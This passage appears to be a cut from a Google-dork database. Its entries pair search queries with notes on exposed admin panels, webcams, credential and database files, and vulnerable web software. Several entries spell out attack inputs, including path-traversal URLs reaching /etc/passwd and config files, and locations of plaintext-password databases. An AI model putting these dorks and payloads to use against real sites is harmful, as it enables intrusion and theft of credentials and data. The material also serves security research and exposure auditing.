2. intitle:"system.info" "MoniWiki" [descr]] [[url]http://www.google.com/search?hl=en&q=filetype%3Aphp+inurl%3Awiki+%28inurl%3A%22SystemInfo%22+%7C+inurl%3AFindPage%7C+inurl%3AHelpContents%7C+inurl%3ARecentChanges%29+&btnG=Google+Search[url]] [[dork]filetype:php inurl:wiki (inurl:"SystemInfo" | inurl:FindPage| inurl:HelpContents| inurl:RecentChanges) [dork]] [end][741]] [[start][742] [[title]intitle:"AppServ Open Project" -site:www.appservnetwork.com[[title]] [[descr]AppServ is an Apache/PHP/MySQL open source software installer package. This normally includes convenient links to phpMyAdmin and phpInfo() pages.[descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=intitle%3A%22AppServ+Open+Project%22+-site%3Awww.appservnetwork.com&btnG=Search[url]] [[dork]intitle:"AppServ Open Project" -site:www.appservnetwork.com[dork]] [end][742]] [[start][743] [[title]"powered by YellDL"[title]] [[descr]Finds websites using YellDL (also known as YellDownLoad), a download tracker written in PHP. Unfortunately this downloader serves any file you ask for, including its own files:

http://xxxxxxxxxx/download.php?f=../download&e=php

By guessing, someone could download information which shouldn't get out of the server (think of ../phpMyAdmin/config.php or other stuff; no need to say that lazy people use the same passwords for their DB and FTP logins).

Another search to find this software is:

"You are downloading *" "you are downloader number * of this file" [descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][743]] [[start][744] [[title]intitle:"index of" intext:"content.ie5"[title]] [[descr]This dork indicates the "Local Settings" dir in most cases, and browsable server directories in general.[descr]] [[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&q=intitle%3A%22index+of%22+intext%3A%22content%2Eie5%22[url]] [[dork]intitle:"index of" intext:"content.ie5"[dork]] [end][744]] [[start][745] [[title]intitle:"php icalendar administration" -site:sourceforge.net[[title]] [[descr]PHP iCalendar is a php-based iCal file parser. It's based on v2.0 of the IETF spec. It displays iCal files in a nice logical, clean manner with day, week, month, and year navigation.
This reveals the administration interface.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22php+icalendar+administration%22+-site%3Asourceforge.net[url]] [[dork]intitle:"php icalendar administration" -site:sourceforge.net[dork]] [end][745]] [[start][746] [[title]intitle:"Web Server Statistics for ****"[title]] [[descr]These are Analog web statistics reports. The failure report shows information leakage about database drivers, admin login pages, SQL statements, etc.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22Web+Server+Statistics+for+****%22&btnG=Search[url]] [[dork]intitle:"Web Server Statistics for ****"[dork]] [end][746]] [[start][747] [[title]filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net[[title]] [[descr]PHP iCalendar is a php-based iCal file parser. It's based on v2.0 of the IETF spec. It displays iCal files in a nice logical, clean manner with day, week, month, and year navigation.
This reveals the RSS info for the user calendars. [descr]] [[url]http://www.google.com/search?num=100&&q=filetype%3Aphp+inurl%3Aindex+inurl%3Aphpicalendar+-site%3Asourceforge.net[url]] [[dork]filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net[dork]] [end][747]] [[start][749] [[title]intitle:"php icalendar administration" -site:sourceforge.net[[title]] [[descr]This is the administration login portal search for PHP iCalendar. It is compatible with Evolution and clients for other platforms. Admin authentication has two choices, FTP and Internal. For the latter the defaults are "admin/admin".

There is also a more generic search in the GHDB that an attacker can use and then modify to ../admin.php to reach the administration pages. Access to administration allows an attacker to upload new ICS files or delete present ones.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22php+icalendar+administration%22+-site%3Asourceforge.net[url]] [[dork]intitle:"php icalendar administration" -site:sourceforge.net[dork]] [end][749]] [[start][750] [[title]intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"[title]] [[descr]phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields.

The servers found here can be accessed without authentication. This search is restricted to NON-ROOT users! See ID 510 for a root user search. [descr]] [[url]http://www.google.com/search?q=intitle%3AphpMyAdmin+%22Welcome+to+phpMyAdmin+***%22+%22running+on+*+as+root%40*%22&start=0[url]] [[dork]intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"[dork]] [end][750]] [[start][751] [[title]"please visit" intitle:"i-Catcher Console" Copyright "iCode Systems"[title]] [[descr]CCTV webcams by ICode.[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][751]] [[start][752] [[title]inurl:irc filetype:cgi cgi:irc[[title]] [[descr]CGIIRC is a web-based IRC client. Using a non-transparent proxy an attacker could communicate anonymously by sending direct messages to a contact. Most servers are restricted to one IRC server and one or more default channels and will not allow access to anything else.[descr]] [[url]http://www.google.com/search?num=100&q=inurl%3Airc+filetype%3Acgi+cgi%3Airc[url]] [[dork]inurl:irc filetype:cgi cgi:irc[dork]] [end][752]] [[start][753] [[title]natterchat inurl:home.asp -site:natterchat.co.uk[[title]] [[descr]NatterChat is a web-based chat system written in ASP.

An SQL injection vulnerability is identified in the application that may allow attackers to pass malicious input to database queries, resulting in the modification of query logic or other attacks. This allows the attacker to gain admin access... [descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=natterchat+inurl%3Ahome.asp+-site%3Anatterchat.co.uk+&btnG=Search[url]] [[dork]natterchat inurl:home.asp -site:natterchat.co.uk [dork]] [end][753]] [[start][754] [[title]filetype:inf inurl:capolicy.inf[[title]] [[descr]The CAPolicy.inf file provides Certificate Services configuration information, which is read during initial CA installation and whenever you renew a CA certificate. The CApolicy.inf file defines settings specific to root CAs, as well as settings that affect all CAs in the CA hierarchy.[descr]] [[url]http://www.google.com/search?q=filetype%3Ainf+inurl%3Acapolicy.inf&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox&rls=org.mozilla:en-US:official[url]] [[dork]filetype:inf inurl:capolicy.inf[dork]] [end][754]] [[start][755] [[title]"Certificate Practice Statement" inurl:(PDF | DOC)[[title]] [[descr]Certificate Practice Statement (CPS)
A CPS defines the measures taken to secure CA operation and the management of CA-issued certificates. You can consider a CPS to be an agreement between the organization managing the CA and the people relying on the certificates issued by the CA.[descr]] [[url]http://www.google.com/search?hl=en&lr=&safe=off&q=%22Certificate+Practice+Statement%22+inurl%3A%28PDF+%7C+DOC%29&btnG=Search[url]] [[dork]"Certificate Practice Statement" inurl:(PDF | DOC)[dork]] [end][755]] [[start][757] [[title]filetype:cgi inurl:cachemgr.cgi[[title]] [[descr]cachemgr.cgi is a management interface for the Squid proxy service. It was installed by default in /cgi-bin by RedHat Linux 5.2 and 6.0 installed with Squid. This script prompts for a host and port which it then attempts to connect to. If a web server, such as Apache, is running this can be used to connect to arbitrary hosts and ports, allowing for potential use as an intermediary in denial of service attacks, proxied port scans, etc. Interpreting the output of the script can allow the attacker to determine whether or not a connection was established. [descr]] [[url]http://www.google.com/search?hl=en&q=filetype%3Acgi+inurl%3Acachemgr.cgi[url]] [[dork]filetype:cgi inurl:cachemgr.cgi[dork]] [end][757]] [[start][758] [[title]inurl:chap-secrets -cvs[[title]] [[descr]Linux VPNs store their usernames and passwords for CHAP authentication in a file called "chap-secrets" where the usernames and the passwords are in cleartext.
[descr]] [[url]http://www.google.com/search?hl=en&q=inurl%3Achap-secrets+-cvs+&btnG=Suche&meta=[url]] [[dork]inurl:chap-secrets -cvs [dork]] [end][758]] [[start][759] [[title]inurl:pap-secrets -cvs[[title]] [[descr]Linux VPNs store their usernames and passwords for PAP authentication in a file called "pap-secrets" where the usernames and the passwords are in cleartext.
[descr]] [[url]http://www.google.com/search?hl=en&lr=&q=inurl%3Apap-secrets+-cvs+&btnG=Search[url]] [[dork]inurl:pap-secrets -cvs [dork]] [end][759]] [[start][760] [[title]filetype:ini inurl:"serv-u.ini"[title]] [[descr]Serv-U is an FTP/administration server for Windows. This file leaks info about the version, username and password. Passwords are encrypted, but there is a decryption program available on the Net. An attacker could use this search to upload dangerous code etc.[descr]] [[url]http://www.google.com/search?&q=filetype%3Aini+inurl%3A%22serv-u.ini%22[url]] [[dork]filetype:ini inurl:"serv-u.ini"[dork]] [end][760]] [[start][761] [[title]inurl:"forumdisplay.php" +"Powered by: vBulletin Version 3.0.0..4"[title]] [[descr]vBulletin is reported vulnerable to a remote SQL injection vulnerability. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query.

An attacker may exploit this issue to manipulate and inject SQL queries onto the underlying database. It will be possible to leverage this issue to steal database contents including administrator password hashes and user credentials as well as to make attacks against the underlying database.

Versions 3.0 through to 3.0.3 are reportedly affected by this issue.

http://www.securityfocus.com/bid/11193
[descr]] [[url]http://www.google.com/search?q=inurl:%22forumdisplay.php%22+%2B%22Powered+by:+vBulletin+Version+3.0.0..4%22+&hl=en&lr=&c2coff=1&client=firefox-a&rls=org.mozilla:en-US:official&start=80&sa=N[url]] [[dork]inurl:"forumdisplay.php" +"Powered by: vBulletin Version 3.0.0..4" [dork]] [end][761]] [[start][762] [[title]WebControl intitle:"AMX NetLinx"[title]] [[descr]AMX Netlink is a server appliance which connects various devices like a beamer, laptop or video recorder to the internet.[descr]] [[url]http://www.google.com/search?q=WebControl+intitle%3A%22AMX+NetLinx%22&btnG=Search&hl=en&lr=&c2coff=1&client=firefox[url]] [[dork]WebControl intitle:"AMX NetLinx"[dork]] [end][762]] [[start][763] [[title]inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx[[title]] [[descr]Windows Small Business Server 2003: The network configuration page is called "ConnectComputer/precheck.htm " and the Remote Web login page is called "remote/logon.aspx".[descr]] [[url]http://www.google.com/search?q=inurl%3AConnectComputer%2Fprecheck.htm+%7C+inurl%3ARemote%2Flogon.aspx[url]] [[dork]inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx[dork]] [end][763]] [[start][764] [[title]inurl:aol*/_do/rss_popup?blogID=[[title]] [[descr]AOL Journals BlogID Incrementing Discloses Account Names and Email Addresses

AOL Journals is basically America Online's version of a blog (weblog) for AOL members/subscribers. A vulnerability in AOL Journals allows an attacker to increment the BlogID numbers provided to the program and enumerate a list of AOL members/subscribers and their corresponding email addresses.
[descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=inurl%3Aaol*%2F_do%2Frss_popup%3FblogID%3D&btnG=Search[url]] [[dork]inurl:aol*/_do/rss_popup?blogID=[dork]] [end][764]] [[start][765] [[title](inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)[[title]] [[descr]This is a "double dork" that finds two different shopping carts, both vulnerable:

1) Cyber-Village Online Consulting Shopping Cart

Cyber-Village's script is known to not sanitize the user input properly which leads to code execution problems.

2) Hassan Consulting's Shopping Cart
For Hassan's cart it is reported that a remote user can request the 'shop.cfg' and that the script allows directory traversal.

[descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=%28inurl%3A%2Fshop.cgi%2Fpage%3D%29+%7C+%28inurl%3A%2Fshop.pl%2Fpage%3D%29&btnG=Search[url]] [[dork](inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)[dork]] [end][765]] [[start][766] [[title]inurl:newsdesk.cgi? inurl:"t="[title]] [[descr]Newsdesk is a cgi script designed to allow remote administration of website news headlines.

Due to a failure in the sanitization of parameters a remote user can reveal the contents of any file. This allows the attacker to download user and password data.

It is furthermore known that it is possible to run system commands remotely.
[descr]] [[url]http://www.google.com/search?q=inurl:newsdesk.cgi%3F+inurl:%22t%3D%22&hl=en&lr=&ie=UTF-8&c2coff=1&client=firefox-a&start=10&sa=N[url]] [[dork]inurl:newsdesk.cgi? inurl:"t="[dork]] [end][766]] [[start][767] [[title]"Switch to table format" inurl:table|plain[[title]] [[descr]This is an index page of OReilly WebSite Professional.
WebSite Pro was developed by O'Reilly and discontinued in August 2001. The product was then continued by Deerfield.com.
[descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=%22Switch+to+table+format%22+inurl%3Atable%7Cplain&btnG=Search[url]] [[dork]"Switch to table format" inurl:table|plain[dork]] [end][767]] [[start][768] [[title]intitle:"Home" "Xerox Corporation" "Refresh Status"[title]] [[descr]CentreWare Internet Services is an interactive service that uses Internet technology to extend the capabilities of your DocuPrint printer using Internet technology. An HTTP server application developed by Xerox is resident on your network-enabled DocuPrint printer. This HTTP server provides access to advanced services for the installation, configuration, and management of your DocuPrint printer. [descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=intitle%3A%22Home%22+%22Xerox+Corporation%22+%22Refresh+Status%22&btnG=Search[url]] [[dork]intitle:"Home" "Xerox Corporation" "Refresh Status"[dork]] [end][768]] [[start][769] [[title]inurl:webutil.pl[[title]] [[descr]webutil.pl is a web interface to the following services:

* ping
* traceroute
* whois
* finger
* nslookup
* host
* dnsquery
* dig
* calendar
* uptime [descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=inurl%3Awebutil.pl&btnG=Search[url]] [[dork]inurl:webutil.pl[dork]] [end][769]] [[start][770] [[title]"About Mac OS Personal Web Sharing"[title]] [[descr]Mac OS Personal Web Sharing allows Mac OS users to share Folders over the Web.

If you open this page you will be shown the system's major version as a requirement.[descr]] [[url]http://www.google.com/search?q=%22About+Mac+OS+Personal+Web+Sharing%22&hl=en&lr=&c2coff=1&client=firefox-a&filter=0[url]] [[dork]"About Mac OS Personal Web Sharing"[dork]] [end][770]] [[start][771] [[title]ext:conf NoCatAuth -cvs[[title]] [[descr]NoCatAuth configuration file. This reveals the configuration details of a wireless gateway including IP addresses, device names and paths.[descr]] [[url]http://www.google.com/search?q=ext:conf+NoCatAuth+-cvs&hl=en&lr=&filter=0[url]] [[dork]ext:conf NoCatAuth -cvs[dork]] [end][771]] [[start][772] [[title]inurl:"putty.reg"[title]] [[descr]This registry dump contains PuTTY saved session data. SSH servers, the corresponding usernames and proxy configurations are stored here.
[descr]] [[url]http://www.google.com/search?q=inurl%3A%22putty.reg%22&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official[url]] [[dork]inurl:"putty.reg"[dork]] [end][772]] [[start][773] [[title]intitle:"Icecast Administration Admin Page"[title]] [[descr]Icecast streaming audio server web admin.

This gives you a list of connected clients. Interesting way of finding attackable client computers.

[descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=intitle%3A%22Icecast+Administration+Admin+Page%22&btnG=Search[url]] [[dork]intitle:"Icecast Administration Admin Page"[dork]] [end][773]] [[start][774] [[title]inurl:/adm-cfgedit.php[[title]] [[descr]PhotoPost Pro is a photo gallery system. This dork finds its installation page.
You can use this page to set all parameters of the system.
The existing data is not shown :([descr]] [[url]http://www.google.com/search?q=inurl%3A%2Fadm-cfgedit.php+&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official[url]] [[dork]inurl:/adm-cfgedit.php [dork]] [end][774]] [[start][775] [[title]"liveice configuration file" ext:cfg -site:sourceforge.net[[title]] [[descr]This finds the liveice.cfg file which contains all configuration data for an Icecast server. Passwords are saved unencrypted in this file.[descr]] [[url]http://www.google.com/search?q=%22liveice+configuration+file%22+ext:cfg+-site:sourceforge.net&hl=en&lr=&c2coff=1&filter=0[url]] [[dork]"liveice configuration file" ext:cfg -site:sourceforge.net[dork]] [end][775]] [[start][776] [[title]inurl:portscan.php "from Port"|"Port Range"[title]] [[descr]This is a general search for online port scanners that accept any IP. It does not find a specific scanner script, but searches for a pattern which will match some more scanners.
[descr]] [[url]http://www.google.com/search?q=inurl:portscan.php+%22from+Port%22%7C%22Port+Range%22&num=100&hl=en&lr=&ie=UTF-8&c2coff=1&safe=off&client=firefox-a&rls=org.mozilla:en-US:official&filter=0[url]] [[dork]inurl:portscan.php "from Port"|"Port Range"[dork]] [end][776]] [[start][777] [[title]intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers."[title]] [[descr]Lots of information leakage on these pages about active network services, server info, network connections, etc..[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=ISO-8859-1&safe=off&c2coff=1&q=++intitle%3A%22sysinfo+*+%22+intext%3A%22Generated+by+Sysinfo+*+written+by+The+Gamblers.%22+&btnG=Search[url]] [[dork] intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers." [dork]] [end][777]] [[start][778] [[title]filetype:pst pst -from -to -date[[title]] [[descr]Finds Outlook PST files which can contain emails, calendaring and address information.[descr]] [[url]http://www.google.com/search?hl=en&lr=&q=filetype%3Apst+pst+-from+-to+-date&btnG=Search[url]] [[dork]filetype:pst pst -from -to -date[dork]] [end][778]] [[start][779] [[title]intitle:Configuration.File inurl:softcart.exe[[title]] [[descr]This search finds configuration file errors within the softcart application. It includes the name of the configuration file and discloses server file paths.[descr]] [[url]http://www.google.com/search?hl=en&q=intitle%3AConfiguration.File+inurl%3Asoftcart.exe&btnG=Google+Search[url]] [[dork]intitle:Configuration.File inurl:softcart.exe[dork]] [end][779]] [[start][780] [[title]inurl:technote inurl:main.cgi*filename=*[[title]] [[descr]http://www.securityfocus.com/bid/2156/discussion/

Remote command execution vulnerability in the filename parameter.[descr]] [[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=inurl%3Atechnote+inurl%3Amain.cgi*filename%3D*+&btnG=Google+Search[url]] [[dork]inurl:technote inurl:main.cgi*filename=* [dork]] [end][780]] [[start][781] [[title]intext:"Ready with 10/100T Ethernet"[title]] [[descr]Xerox 860 and 8200 Printers.[descr]] [[url]http://www.google.com/search?q=intext:%22Ready+with+10/100T+Ethernet%22&hl=en&lr=&c2coff=1&filter=0[url]] [[dork]intext:"Ready with 10/100T Ethernet"[dork]] [end][781]] [[start][782] [[title]intext:"UAA (MSB)" Lexmark -ext:pdf[[title]] [[descr]Lexmark printers (T620, T522, Optra T614, E323, T622, Optra T610, Optra T616, T520 and Optra S 1855)[descr]] [[url]http://www.google.com/search?q=intext%3A%22UAA+%28MSB%29%22++Lexmark+-ext%3Apdf[url]] [[dork]intext:"UAA (MSB)" Lexmark -ext:pdf[dork]] [end][782]] [[start][783] [[title]intitle:"Welcome to Your New Home Page!" "by the Debian release"[title]] [[descr]This finds the default Apache page on Debian installs.[descr]] [[url]http://www.google.com/search?num=100&q=intitle%3A%22Welcome+to+Your+New+Home+Page%21%22+%22by+the+Debian+release%22[url]] [[dork]intitle:"Welcome to Your New Home Page!" "by the Debian release"[dork]] [end][783]] [[start][785] [[title]"intitle:Index.Of /" stats merchant cgi-* etc[[title]] [[descr]This search looks for indexes with the following subdirectories: stats, merchant, online-store and cgi-local or cgi-bin. These servers have a shopping cart application called softcart in their cgi-local or cgi-bin directory.

Reportedly, it is possible to execute arbitrary code by passing a malformed CGI parameter in an HTTP GET request. This issue is known to affect SoftCart version 4.00b. [descr]] [[url]http://www.google.com/search?q=%22intitle%3AIndex.Of+%2F%22+stats+merchant+cgi-*+etc[url]] [[dork]"intitle:Index.Of /" stats merchant cgi-* etc[dork]] [end][785]] [[start][788] [[title]"running: Nucleus v3.1" -.nucleuscms.org -demo[[title]] [[descr]Multiple unspecified vulnerabilities reportedly affect Nucleus CMS. A remote attacker may leverage these issues to steal cookie-based authentication credentials, reveal sensitive data and corrupt database contents.

http://www.securityfocus.com/bid/11631[descr]] [[url]http://www.google.com/search?q=%22running%3A+Nucleus+v3.1%22+-.nucleuscms.org+-demo[url]] [[dork]"running: Nucleus v3.1" -.nucleuscms.org -demo[dork]] [end][788]] [[start][789] [[title]"driven by: ASP Message Board"[title]] [[descr]Multiple unspecified vulnerabilities reportedly affect the Infusium ASP Message Board. A remote attacker may leverage these issues to steal cookie-based authentication credentials, reveal sensitive data and corrupt database contents.

vulnerable Infuseum ASP Message Board 2.2.1 c

Adding the 2.2.1c seems to filter out some good positives, so I left it out.[descr]] [[url]http://www.google.com/search?q=%22driven+by%3A+ASP+Message+Board%22[url]] [[dork]"driven by: ASP Message Board"[dork]] [end][789]] [[start][791] [[title]"intitle:Cisco Systems, Inc. VPN 3000 Concentrator"[title]] [[descr]The Cisco VPN 3000 Concentrator is a remote access VPN.
The 'Concentrator' is a piece of hardware that manages a company's VPNs.
This Google dork searches for the Concentrator's login portal for remote access. With the correct username and password an attacker can '0wn' their Concentrator; i.e. be able to delete, copy, read, configure anything on the Concentrator.[descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22intitle%3ACisco+Systems%2C+Inc.+VPN+3000+Concentrator%22&btnG=Search[url]] [[dork]"intitle:Cisco Systems, Inc. VPN 3000 Concentrator"[dork]] [end][791]] [[start][793] [[title]ext:asp inurl:DUgallery intitle:"3.0" -site:dugallery.com -site:duware.com[[title]] [[descr]The MS Access database can be downloaded from inside the docroot. The user table holds the admin password in plain text. Possible locations for the DUgallery database are:

http://xx/.../DUgallery/database/dugallery.mdb
http://xx/.../DUgallery//_private/DUgallery.mdb

http://www.securitytracker.com/alerts/2004/Nov/1012201.html[descr]] [[url]http://www.google.com/search?num=100&hl=en&safe=off&q=ext%3Aasp+inurl%3ADUgallery+intitle%3A%223.0%22+-site%3Adugallery.com+-site%3Aduware.com&btnG=Search[url]] [[dork]ext:asp inurl:DUgallery intitle:"3.0" -site:dugallery.com -site:duware.com[dork]] [end][793]] [[start][794] [[title]ext:asp "powered by DUForum" inurl:(messages|details|login|default|register) -site:duware.com[[title]] [[descr]DUForum is one of those free forum software packages. The database location is determined by the config file "connDUforumAdmin.asp", but the installation instructions don't recommend changing it. Ouch..

Database location is: http://server/duforum/_private/DUforum.mdb[descr]] [[url]http://www.google.com/search?hl=en&q=ext%3Aasp+%22powered+by+DUForum%22+inurl%3A%28messages%7Cdetails%7Clogin%7Cdefault%7Cregister%29+-site%3Aduware.com[url]] [[dork]ext:asp "powered by DUForum" inurl:(messages|details|login|default|register) -site:duware.com[dork]] [end][794]] [[start][795] [[title]intext:"enable secret 5 $"[title]] [[descr]Sometimes people make mistakes and post their Cisco configs on "help sites" and don't edit the sensitive fields first. Don't forget to also query Google Groups for this string.[descr]] [[url]http://www.google.com/search?hl=en&q=intext%3A%22enable+secret+5+%24%22[url]] [[dork]intext:"enable secret 5 $"[dork]] [end][795]] [[start][796] [[title]inurl:postfixadmin intitle:"postfix admin" ext:php[[title]] [[descr]Postfix Admin login pages. Duh.[descr]] [[url]http://www.google.com/search?hl=en&q=inurl%3Apostfixadmin+intitle%3A%22postfix+admin%22+ext%3Aphp[url]] [[dork]inurl:postfixadmin intitle:"postfix admin" ext:php[dork]] [end][796]] [[start][797] [[title]ext:cgi inurl:editcgi.cgi inurl:file=[[title]] [[descr]This was inspired by the K-Otic report. Only two results at time of writing. The CGI script lets you view any file on the system, including /etc/.. (guess it ;)

http://www.k-otik.com/exploits/08242004.Axis.sh.php[descr]] [[url]http://www.google.com/search?q=ext%3Acgi+inurl%3Aeditcgi.cgi+inurl%3Afile%3D[url]] [[dork]ext:cgi inurl:editcgi.cgi inurl:file=[dork]] [end][797]] [[start][798] [[title]inurl:axis-cgi[[title]] [[descr]Just another search string to detect the infamous Axis netcams. This company actually changed the generic /cgi-bin/ directory name to /axis-cgi/, making it easier to d0rk them ;)[descr]] [[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=inurl%3Aaxis-cgi[url]] [[dork]inurl:axis-cgi[dork]] [end][798]] [[start][799] [[title]filetype:ns1 ns1[[title]] [[descr]NetStumbler files contain information about the wireless network. For a cleanup add stuff like: +"Creator" +"Format" +"DateGMT".[descr]] [[url]http://www.google.com/search?hl=en&q=filetype%3Ans1+ns1[url]] [[dork]filetype:ns1 ns1[dork]] [end][799]] [[start][800] [[title]"Starting SiteZAP 6.0"[title]] [[descr]SiteZap webcams ![descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22Starting+SiteZAP+6.0%22[url]] [[dork]"Starting SiteZAP 6.0"[dork]] [end][800]] [[start][802] [[title]filetype:config web.config -CVS[[title]] [[descr]Through Web.config an IIS administrator can specify settings like custom 404 error pages, authentication and authorization settings for the Web site.

This file can hold a plaintext password in the worst case, or just reveal the full path info on a 404 error.[descr]] [[url]http://www.google.com/search?hl=en&q=filetype%3Aconfig+web.config+-CVS[url]] [[dork]filetype:config web.config -CVS[dork]] [end][802]] [[start][803] [[title]filetype:myd myd -CVS[[title]] [[descr]MySQL stores its data for each database in individual files with the extension MYD.

An attacker can copy these files to his machine and using a tool like 'strings' possibly view the contents of the database.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=++filetype%3Amyd+myd+-CVS&btnG=Search[url]] [[dork] filetype:myd myd -CVS[dork]] [end][803]] [[start][804] [[title]filetype:myi myi -CVS[[title]] [[descr]MySQL stores its data for each database in individual files with the extension MYI.

An attacker can copy these files to his machine and using a tool like 'strings' possibly view the contents of the database.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=filetype%3Amyi+myi+-CVS&btnG=Search[url]] [[dork]filetype:myi myi -CVS[dork]] [end][804]] [[start][805] [[title]"Obtenez votre forum Aztek" -site:forum-aztek.com[[title]] [[descr]Aztek Forum is a French forum system. Aztek Forum is reported prone to multiple input validation vulnerabilities. These issues may allow an attacker to carry out cross-site scripting and possibly other attacks.

http://www.securityfocus.com/bid/11654[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][805]] [[start][806] [[title]intext:("UBB.threads™ 6.2"|"UBB.threads™ 6.3") intext:"You * not logged *" -site:ubbcentral.com[[title]] [[descr]UBB.Threads 6.2.*-6.3.* one char bruteforce vulnerability:
http://www.k-otik.com/exploits/20041116.r57ubb.pl.php

[descr]] [[url]http://www.google.com/search?num=100&q=intext%3A%28%22UBB.threads%E2%84%A2+6.2%22%7C%22UBB.threads%E2%84%A2+6.3%22%29+intext%3A%22You+*+not+logged+*%22+-site%3Aubbcentral.com[url]] [[dork]intext:("UBB.threads™ 6.2"|"UBB.threads™ 6.3") intext:"You * not logged *" -site:ubbcentral.com[dork]] [end][806]] [[start][807] [[title]inurl:/SiteChassisManager/[[title]] [[descr]Unknown SQL injection and XSS vulnerabilities in DMXReady Site Chassis Manager.

http://www.securityfocus.com/bid/11434/discussion/[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3A%2FSiteChassisManager%2F+&btnG=Search[url]] [[dork]inurl:/SiteChassisManager/ [dork]] [end][807]] [[start][808] [[title]"Powered by Land Down Under 601"[title]] [[descr]SQL injection vulnerability in Land Down Under 601 could give an attacker administrative access. An exploit exists on the internet, search google.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22Powered+by+Land+Down+Under+601%22[url]] [[dork]"Powered by Land Down Under 601"[dork]] [end][808]] [[start][809] [[title]intitle:"EvoCam" inurl:"webcam.html"[title]] [[descr]Evocams ![descr]] [[url]http://www.google.com/search?q=intitle:%22EvoCam%22+inurl:%22webcam.html%22&hl=en&lr=&c2coff=1&start=0&sa=Nurl[url]] [[dork]intitle:"EvoCam" inurl:"webcam.html"[dork]] [end][809]] [[start][810] [[title]inurl:directorypro.cgi[[title]] [[descr]A security vulnerability in the product allows attackers to perform a directory traversal attack and access files that reside outside the normal HTTP root directory.

http://target/cgi-bin/directorypro.cgi?want=showcat&show=../../../../etc/passwd%00

http://www.securityfocus.com/bid/2793
[descr]] [[url]http://www.google.com/search?q=inurl%3Adirectorypro.cgi[url]] [[dork]inurl:directorypro.cgi[dork]] [end][810]] [[start][811] [[title]intitle:"PhpMyExplorer" inurl:"index.php" -cvs[[title]] [[descr]PhpMyExplorer is a PHP application that allows you to easily update your site online without any FTP access. A security vulnerability in the product allows attackers to view and read files that reside outside the normal bound directory.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22PhpMyExplorer%22+inurl%3A%22index.php%22+-cvs[url]] [[dork]intitle:"PhpMyExplorer" inurl:"index.php" -cvs[dork]] [end][811]] [[start][812] [[title]inurl:cal_make.pl[[title]] [[descr]A security vulnerability in PerlCal allows remote attackers to access files that reside outside the normally bounding HTML root directory.

http://www.securityfocus.com/bid/2663[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3Acal_make.pl&btnG=Search[url]] [[dork]inurl:cal_make.pl[dork]] [end][812]] [[start][813] [[title]inurl:/webedit.* intext:WebEdit Professional -html[[title]] [[descr]WebEdit is a content management system. This is the login portal search.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3A%2Fwebedit.*+intext%3AWebEdit+Professional+-html[url]] [[dork]inurl:/webedit.* intext:WebEdit Professional -html[dork]] [end][813]] [[start][814] [[title]intitle:"CGIWrap Error: *"[title]] [[descr]CGIWrap error pages.
CGIWrap is a gateway program that allows general users to use CGI scripts and HTML forms without compromising the security of the http server.
These pages reveal some information depending on the error message. This can be

* usernames
* path and filenames
* wrong script permission! "Script is group writable."
